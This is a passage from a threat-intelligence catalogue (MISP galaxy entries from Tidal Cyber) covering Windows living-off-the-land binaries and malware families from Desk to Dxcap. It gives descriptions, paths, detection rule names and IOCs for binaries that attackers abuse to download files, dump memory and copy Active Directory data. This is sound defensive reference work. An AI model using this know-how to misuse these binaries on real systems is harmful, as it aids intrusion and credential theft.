Resources: * https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt * https://twitter.com/pabraeken/status/998627081360695297 * https://twitter.com/VakninHai/status/1517027824984547329 * https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files
Detection: * Sigma: file_event_win_new_src_file.yml * Sigma: proc_creation_win_lolbin_rundll32_installscreensaver.yml * Sigma: registry_set_scr_file_executed_by_rundll32.yml[Desk.cpl - LOLBAS Project]
Internal MISP references
UUID 1863a7e2-6212-48a0-b109-15d0198b93e2 which can be used as unique global reference for Desk in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5188 |
| source | Tidal Cyber |
| tags | ['7ad2b1d5-c228-4bf5-bf8e-c80a8fef0079', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Desktopimgdownldr
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows binary used to configure lockscreen/desktop image
Author: Gal Kristal
Paths: * c:\windows\system32\desktopimgdownldr.exe
Resources: * https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
Detection: * Sigma: proc_creation_win_desktopimgdownldr_susp_execution.yml * Sigma: file_event_win_susp_desktopimgdownldr_file.yml * Elastic: command_and_control_remote_file_copy_desktopimgdownldr.toml * IOC: desktopimgdownldr.exe that creates non-image file * IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl[Desktopimgdownldr.exe - LOLBAS Project]
Internal MISP references
UUID 1b31652d-30bb-4c6e-bfe1-f2921a0aa64e which can be used as unique global reference for Desktopimgdownldr in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5100 |
| source | Tidal Cyber |
| tags | ['acc0e091-a071-4e83-b0b1-4f3adebeafa3', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
DeviceCredentialDeployment
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Device Credential Deployment
Author: Elliot Killick
Paths: * C:\Windows\System32\DeviceCredentialDeployment.exe
Resources: None Provided
Detection: * IOC: DeviceCredentialDeployment.exe should not be run on a normal workstation * Sigma: proc_creation_win_lolbin_device_credential_deployment.yml[DeviceCredentialDeployment.exe - LOLBAS Project]
Internal MISP references
UUID b99bdf39-8dcf-4bae-95af-b029d48cb579 which can be used as unique global reference for DeviceCredentialDeployment in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5101 |
| source | Tidal Cyber |
| tags | ['2a08c2eb-e90e-4bdb-a2dd-9da06de7ed25', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Devinit
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Visual Studio 2019 tool
Author: mr.d0x
Paths: * C:\Program Files\Microsoft Visual Studio*\Community\Common7\Tools\devinit\devinit.exe * C:\Program Files (x86)\Microsoft Visual Studio*\Community\Common7\Tools\devinit\devinit.exe
Resources: * https://twitter.com/mrd0x/status/1460815932402679809
Detection: * Sigma: proc_creation_win_devinit_lolbin_usage.yml[Devinit.exe - LOLBAS Project]
Internal MISP references
UUID 102714a0-6b18-4d05-83c2-dd2929ce685a which can be used as unique global reference for Devinit in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5213 |
| source | Tidal Cyber |
| tags | ['bb814941-0155-49b1-8f93-39626d4f0ddd', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Devtoolslauncher
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary will execute specified binary. Part of VS/VScode installation.
Author: felamos
Paths: * c:\windows\system32\devtoolslauncher.exe
Resources: * https://twitter.com/_felamos/status/1179811992841797632
Detection: * Sigma: proc_creation_win_lolbin_devtoolslauncher.yml * IOC: DeveloperToolsSvc.exe spawned an unknown process[Devtoolslauncher.exe - LOLBAS Project]
Internal MISP references
UUID 6e213e33-c2e5-494f-bc1a-bf672f95dcf8 which can be used as unique global reference for Devtoolslauncher in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5214 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
devtunnel
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary to enable forwarded ports on windows operating systems.
Author: Kamran Saifullah
Paths:
* C:\Users\
Resources: * https://code.visualstudio.com/docs/editor/port-forwarding
Detection: * IOC: devtunnel.exe binary spawned * IOC: .devtunnels.ms * IOC: .*.devtunnels.ms * Analysis: https://cydefops.com/vscode-data-exfiltration[devtunnel.exe - LOLBAS Project]
Internal MISP references
UUID 672d80fe-656e-4b1b-8234-ebf2c5339166 which can be used as unique global reference for devtunnel in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5252 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
DEWMODE
According to joint Cybersecurity Advisory AA23-158A (June 2023), DEWMODE is a web shell written in PHP that is designed to interact with a MySQL database. During a campaign from 2020 to 2021, threat actors exploited multiple zero-day vulnerabilities in internet-facing Accellion File Transfer Appliance (FTA) devices, installing DEWMODE web shells to exfiltrate data from compromised networks.[Mandiant MOVEit Transfer June 2 2023]
Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode
Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/dewmode/
Internal MISP references
UUID ff0b0792-5dd0-4e10-8b84-8da93a0198aa which can be used as unique global reference for DEWMODE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Linux'] |
| software_attack_id | S5021 |
| source | Tidal Cyber |
| tags | ['a98d7a43-f227-478e-81de-e7299639a355', '311abf64-a9cc-4c6a-b778-32c5df5658be'] |
| type | ['malware'] |
Dfshim
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: ClickOnce engine in Windows used by .NET
Author: Oddvar Moe
Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
Resources: * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf * https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Dfshim.dll - LOLBAS Project]
Internal MISP references
UUID b396eb52-3b6a-44e9-9534-d8b981a52192 which can be used as unique global reference for Dfshim in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5189 |
| source | Tidal Cyber |
| tags | ['91fd24c3-f371-4c3b-b997-cd85e25c0967', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Dfsvc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: ClickOnce engine in Windows used by .NET
Author: Oddvar Moe
Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
Resources: * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf * https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Dfsvc.exe - LOLBAS Project]
Internal MISP references
UUID f85966ec-0c4d-4f7e-949f-bb73828bf601 which can be used as unique global reference for Dfsvc in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5102 |
| source | Tidal Cyber |
| tags | ['18d6d91d-7df0-44c8-88fe-986d9ba00b8d', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Diantz
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary that package existing files into a cabinet (.cab) file
Author: Tamir Yehuda
Paths: * c:\windows\system32\diantz.exe * c:\windows\syswow64\diantz.exe
Resources: * https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz
Detection: * Sigma: proc_creation_win_lolbin_diantz_ads.yml * Sigma: proc_creation_win_lolbin_diantz_remote_cab.yml * IOC: diantz storing data into alternate data streams. * IOC: diantz getting a file from a remote machine or the internet.[diantz.exe_lolbas]
Internal MISP references
UUID 054ddf05-e9f0-4d14-8493-2a1b2ddbefad which can be used as unique global reference for Diantz in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5103 |
| source | Tidal Cyber |
| tags | ['96f9b39f-0c59-48a0-9702-01920c1293a7', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Diavol
Diavol is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. Diavol has been deployed by Bazar and is thought to have potential ties to Wizard Spider.[Fortinet Diavol July 2021][FBI Flash Diavol January 2022][DFIR Diavol Ransomware December 2021]
Internal MISP references
UUID d057b6e7-1de4-4f2f-b374-7e879caecd67 which can be used as unique global reference for Diavol in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0659 |
| source | MITRE |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Dipsind
Dipsind is a malware family of backdoors that appear to be used exclusively by PLATINUM. [Microsoft PLATINUM April 2016]
Internal MISP references
UUID 226ee563-4d49-48c2-aa91-82999f43ce30 which can be used as unique global reference for Dipsind in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0200 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Disco
Disco is a custom implant that has been used by MoustachedBouncer since at least 2020 including in campaigns using targeted malicious content injection for initial access and command and control.[MoustachedBouncer ESET August 2023]
Internal MISP references
UUID 194314e3-4edc-5346-96b6-d2d7bf5d830a which can be used as unique global reference for Disco in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1088 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Diskshadow
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
Author: Oddvar Moe
Paths: * C:\Windows\System32\diskshadow.exe * C:\Windows\SysWOW64\diskshadow.exe
Detection: * Sigma: proc_creation_win_lolbin_diskshadow.yml * Sigma: proc_creation_win_susp_shadow_copies_deletion.yml * Elastic: credential_access_cmdline_dump_tool.toml * IOC: Child process from diskshadow.exe[Diskshadow.exe - LOLBAS Project]
Internal MISP references
UUID 07c49566-5bea-44dc-b81f-e6c90bda9c39 which can be used as unique global reference for Diskshadow in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5104 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Dnscmd
Dnscmd is a Windows command-line utility used to manage DNS servers.[Dnscmd Microsoft]
Internal MISP references
UUID 3fd09997-86e0-4dce-935e-421863e9bad0 which can be used as unique global reference for Dnscmd in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5016 |
| source | Tidal Cyber |
| tags | ['a45f9597-09c4-4e70-a7d3-d8235d2451a3', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
DnsSystem
DnsSystem is a .NET based DNS backdoor, which is a customized version of the open source tool DIG.net, that has been used by HEXANE since at least June 2022.[Zscaler Lyceum DnsSystem June 2022]
Internal MISP references
UUID e69a913d-4ddc-4d69-9961-25a31cae5899 which can be used as unique global reference for DnsSystem in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1021 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
dnx
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: .Net Execution environment file included with .Net.
Author: Oddvar Moe
Paths: * N/A
Resources: * https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
Detection: * Sigma: proc_creation_win_lolbin_dnx.yml * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[dnx.exe - LOLBAS Project]
Internal MISP references
UUID e2bdda2e-54b4-4d35-b7e5-4e20626a4481 which can be used as unique global reference for dnx in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5215 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
DOGCALL
DOGCALL is a backdoor used by APT37 that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. [FireEye APT37 Feb 2018]
Internal MISP references
UUID 81ce23c0-f505-4d75-9928-4fbd627d3bc2 which can be used as unique global reference for DOGCALL in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0213 |
| source | MITRE |
| tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Dok
Dok is a Trojan application disguised as a .zip file that is able to collect user credentials and install a malicious proxy server to redirect a user's network traffic (i.e. Adversary-in-the-Middle).[objsee mac malware 2017][hexed osx.dok analysis 2019][CheckPoint Dok]
Internal MISP references
UUID dfa14314-3c64-4a10-9889-0423b884f7aa which can be used as unique global reference for Dok in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S0281 |
| source | MITRE |
| type | ['malware'] |
Doki
Doki is a backdoor that uses a unique Dogecoin-based Domain Generation Algorithm and was first observed in July 2020. Doki was used in conjunction with the ngrok Mining Botnet in a campaign that targeted Docker servers in cloud platforms. [Intezer Doki July 20]
Internal MISP references
UUID e6160c55-1868-47bd-bec6-7becbf236bbb which can be used as unique global reference for Doki in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Containers', 'Linux'] |
| software_attack_id | S0600 |
| source | MITRE |
| tags | ['efa33611-88a5-40ba-9bc4-3d85c6c8819b'] |
| type | ['malware'] |
Donut
Donut is an open source framework used to generate position-independent shellcode.[Donut Github][Introducing Donut] Donut generated code has been used by multiple threat actors to inject and load malicious payloads into memory.[NCC Group WastedLocker June 2020]
Internal MISP references
UUID 40d25a38-91f4-4e07-bb97-8866bed8e44f which can be used as unique global reference for Donut in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0695 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Dotnet
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: dotnet.exe comes with .NET Framework
Author: felamos
Paths: * C:\Program Files\dotnet\dotnet.exe
Resources: * https://twitter.com/_felamos/status/1204705548668555264 * https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc * https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/ * https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/
Detection: * Sigma: proc_creation_win_lolbin_dotnet.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: dotnet.exe spawned an unknown process[Dotnet.exe - LOLBAS Project]
Internal MISP references
UUID 1bcd9c93-0944-4671-ab01-cabc5ffe30bf which can be used as unique global reference for Dotnet in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5216 |
| source | Tidal Cyber |
| tags | ['09c24b93-bf06-4cbb-acb0-d7b9657a41dc', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Downdelph
Downdelph is a first-stage downloader written in Delphi that has been used by APT28 in rare instances between 2013 and 2015. [ESET Sednit Part 3]
Internal MISP references
UUID f7b64b81-f9e7-46bf-8f63-6d7520da832c which can be used as unique global reference for Downdelph in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0134 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
down_new
down_new is a downloader that has been used by BRONZE BUTLER since at least 2019.[Trend Micro Tick November 2019]
Internal MISP references
UUID 20b796cf-6c90-4928-999e-88107078e15e which can be used as unique global reference for down_new in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0472 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
DownPaper
DownPaper is a backdoor Trojan; its main functionality is to download and run second stage malware. [ClearSky Charming Kitten Dec 2017]
Internal MISP references
UUID fc433c9d-a7fe-4915-8aa0-06b58f288249 which can be used as unique global reference for DownPaper in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0186 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
DRATzarus
DRATzarus is a remote access tool (RAT) that has been used by Lazarus Group to target the defense and aerospace organizations globally since at least summer 2020. DRATzarus shares similarities with Bankshot, which was used by Lazarus Group in 2017 to target the Turkish financial sector.[ClearSky Lazarus Aug 2020]
Internal MISP references
UUID c6c79fc5-e4b1-4f6c-a71d-d22d699d5caf which can be used as unique global reference for DRATzarus in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0694 |
| source | MITRE |
| type | ['malware'] |
Dridex
Dridex is a prolific banking Trojan that first appeared in 2014. By December 2019, the US Treasury estimated Dridex had infected computers in hundreds of banks and financial institutions in over 40 countries, leading to more than $100 million in theft. Dridex was created from the source code of the Bugat banking Trojan (also known as Cridex).[Dell Dridex Oct 2015][Kaspersky Dridex May 2017][Treasury EvilCorp Dec 2019]
Internal MISP references
UUID e3cd4405-b698-41d9-88e4-fff29e7a19e2 which can be used as unique global reference for Dridex in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0384 |
| source | MITRE |
| tags | ['e809d252-12cc-494d-94f5-954c49eb87ce'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
DropBook
DropBook is a Python-based backdoor compiled with PyInstaller.[Cybereason Molerats Dec 2020]
Internal MISP references
UUID 9c44d3f9-7a7b-4716-9cfa-640b36548ab0 which can be used as unique global reference for DropBook in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0547 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Drovorub
Drovorub is a Linux malware toolset comprised of an agent, client, server, and kernel modules, that has been used by APT28.[NSA/FBI Drovorub August 2020]
Internal MISP references
UUID bb7f7c19-ffb5-4bfe-99b1-ead3525c5e7b which can be used as unique global reference for Drovorub in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux'] |
| software_attack_id | S0502 |
| source | MITRE |
| tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59', '1efd43ee-5752-49f2-99fe-e3441f126b00', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
dsdbutil
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Dsdbutil is a command-line tool that is built into Windows Server. It is available if you have the AD LDS server role installed. Can be used as a command line utility to export Active Directory.
Author: Ekitji
Paths: * C:\Windows\System32\dsdbutil.exe * C:\Windows\SysWOW64\dsdbutil.exe
Resources: * https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358 * https://www.netwrix.com/ntds_dit_security_active_directory.html
Detection: * IOC: Event ID 4688 * IOC: dsdbutil.exe process creation * IOC: Event ID 4663 * IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit * IOC: Event ID 4656 * IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit * Analysis: None Provided * Sigma: None Provided * Elastic: None Provided * Splunk: None Provided * BlockRule: None Provided[dsdbutil.exe - LOLBAS Project]
Internal MISP references
UUID 9139c12f-a6d9-4300-8735-9298bc46a0bf which can be used as unique global reference for dsdbutil in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5217 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
dsquery
dsquery is a command-line utility that can be used to query Active Directory for information from a system within a domain. [TechNet Dsquery] It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.
Internal MISP references
UUID 06402bdc-a4a1-4e4a-bfc4-09f2c159af75 which can be used as unique global reference for dsquery in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0105 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'cb3d30b3-8cfc-4202-8615-58a9b8f7f118', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Dtrack
Dtrack is spyware that was discovered in 2019 and has been used against Indian financial institutions, research facilities, and the Kudankulam Nuclear Power Plant. Dtrack shares similarities with the DarkSeoul campaign, which was attributed to Lazarus Group. [Kaspersky Dtrack][Securelist Dtrack][Dragos WASSONITE][CyberBit Dtrack][ZDNet Dtrack]
Internal MISP references
UUID aa21462d-9653-48eb-a82e-5c93c9db5f7a which can be used as unique global reference for Dtrack in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0567 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Dump64
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Memory dump tool that comes with Microsoft Visual Studio
Author: mr.d0x
Paths: * C:\Program Files (x86)\Microsoft Visual Studio\Installer\Feedback\dump64.exe
Resources: * https://twitter.com/mrd0x/status/1460597833917251595
Detection: * Sigma: proc_creation_win_lolbin_dump64.yml * IOC: As a Windows SDK binary, execution on a system may be suspicious[Dump64.exe - LOLBAS Project]
Internal MISP references
UUID 13482336-e22b-48e9-bd49-c6e6fc6612ec which can be used as unique global reference for Dump64 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5218 |
| source | Tidal Cyber |
| tags | ['0f09c7f5-ba57-4ef0-a196-e85558804496', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
DumpMinitool
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Dump tool part Visual Studio 2022
Author: mr.d0x
Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions
Resources: * https://twitter.com/mrd0x/status/1511415432888131586
Detection: * Sigma: proc_creation_win_dumpminitool_execution.yml * Sigma: proc_creation_win_dumpminitool_susp_execution.yml * Sigma: proc_creation_win_devinit_lolbin_usage.yml[DumpMinitool.exe - LOLBAS Project]
Internal MISP references
UUID 7f3bf76a-4e6a-45f1-a4bf-400d5a914e52 which can be used as unique global reference for DumpMinitool in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5219 |
| source | Tidal Cyber |
| tags | ['3b6ad94f-83ce-47bf-b82d-b98358d23434', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Duqu
Duqu is a malware platform that uses a modular approach to extend functionality after deployment within a target network. [Symantec W32.Duqu]
Internal MISP references
UUID d4a664e5-9819-4f33-8b2b-e6f8e6a64999 which can be used as unique global reference for Duqu in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0038 |
| source | MITRE |
| type | ['malware'] |
DustySky
DustySky is multi-stage malware written in .NET that has been used by Molerats since May 2015. [DustySky] [DustySky2][Kaspersky MoleRATs April 2019]
Internal MISP references
UUID 77506f02-104f-4aac-a4e0-9649bd7efe2e which can be used as unique global reference for DustySky in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0062 |
| source | MITRE |
| tags | ['e809d252-12cc-494d-94f5-954c49eb87ce'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Dxcap
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: DirectX diagnostics/debugger included with Visual Studio.
Author: Oddvar Moe
Paths: * C:\Windows\System32\dxcap.exe * C:\Windows\SysWOW64\dxcap.exe
Resources: * https://twitter.com/harr0ey/status/992008180904419328
Detection: * Sigma: proc_creation_win_lolbin_susp_dxcap.yml[Dxcap.exe - LOLBAS Project]
Internal MISP references
UUID 9b5039b9-c5f1-4516-88ef-f63966ec2b36 which can be used as unique global reference for Dxcap in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
